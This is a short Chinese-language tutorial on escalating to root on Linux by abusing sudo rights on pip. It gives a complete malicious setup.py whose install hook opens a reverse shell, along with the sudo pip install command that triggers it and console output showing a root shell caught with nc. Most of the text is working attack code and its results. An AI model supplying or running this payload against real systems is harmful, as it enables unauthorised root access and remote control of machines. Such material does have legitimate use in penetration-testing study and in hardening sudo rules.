python pip提权

在有些linux机器中，某个用户拥有pip的sudo权限，在这种情况下，可以利用pip install进行本地提权。
在执行pip install时会调用setup.py，可以在本地创建恶意setup.py文件来达到任意命令执行的效果。

from setuptools import setup
from setuptools.command.install import install
import os, socket, subprocess

class CustomInstall(install):
  def run(self):
    install.run(self)
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("127.0.0.1",1234))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/sh","-i"])

setup(name='FakePip',
      version='0.0.1',
      description='Reverse shell',
      url='xx.xx.xx.xx',
      author='nathan',
      author_email='[email protected]',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

执行sudo pip install . --upgrade --force-reinstall就能获得root权限的反弹shell

[email protected]:~/vul_study/sudo_pip$ sudo pip install . --upgrade
The directory '/home/nathan/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/nathan/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Processing /home/nathan/vul_study/sudo_pip
Installing collected packages: FakePip
  Found existing installation: FakePip 0.0.1
    Uninstalling FakePip-0.0.1:
      Successfully uninstalled FakePip-0.0.1
  Running setup.py install for FakePip ... -

[email protected]:~/share/trans$ nc -lp 1234
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
FakePip.egg-info
pip-delete-this-directory.txt
pip-egg-info
setup.py
# pwd
/tmp/pip-5AYQjK-build
#